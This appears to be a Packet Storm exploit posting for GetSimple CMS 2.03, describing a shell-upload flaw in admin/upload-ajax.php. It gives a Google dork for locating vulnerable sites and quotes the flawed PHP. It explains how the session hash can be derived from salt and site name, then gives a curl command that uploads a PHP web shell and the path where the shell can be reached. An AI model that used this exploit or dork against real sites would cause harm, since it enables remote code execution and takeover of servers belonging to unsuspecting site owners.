GetSimple CMS version 2.03 suffers from a shell upload vulnerability.
9ed94b019619b8b1467fcb8e3fe717edffd835fa6d5854d7ba75eb8d68916e40# Exploit Title: GetSimple CMS <=2.03 Remote Upload Shell (0day)
# Google Dork: "powered by GetSimple Version 2.03"
# Date: 15/FEB/2011
# Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal)
# Site Author: http://reflective.noblogs.org (OWL?)
(\___/)
(o\ /o)
/|:.V.:|\
\\::::://
-----`"" ""`-----
# Software Link: http://get-simple.info/
# Version: 2.0.3
# Tested on: *nix
----------------------------------------------------------------------
[INFO]
What a Fuck? SESSIONHASH for upload a file? It's a bacon's security...
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,'/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “Filedata=@yourshell.txt;filename=shell.php”
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
After, enjoy your Bacon-Shell here ...http://getsimple_localhost/
data/uploads/shell.php
Thanks to my ASCELL...
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed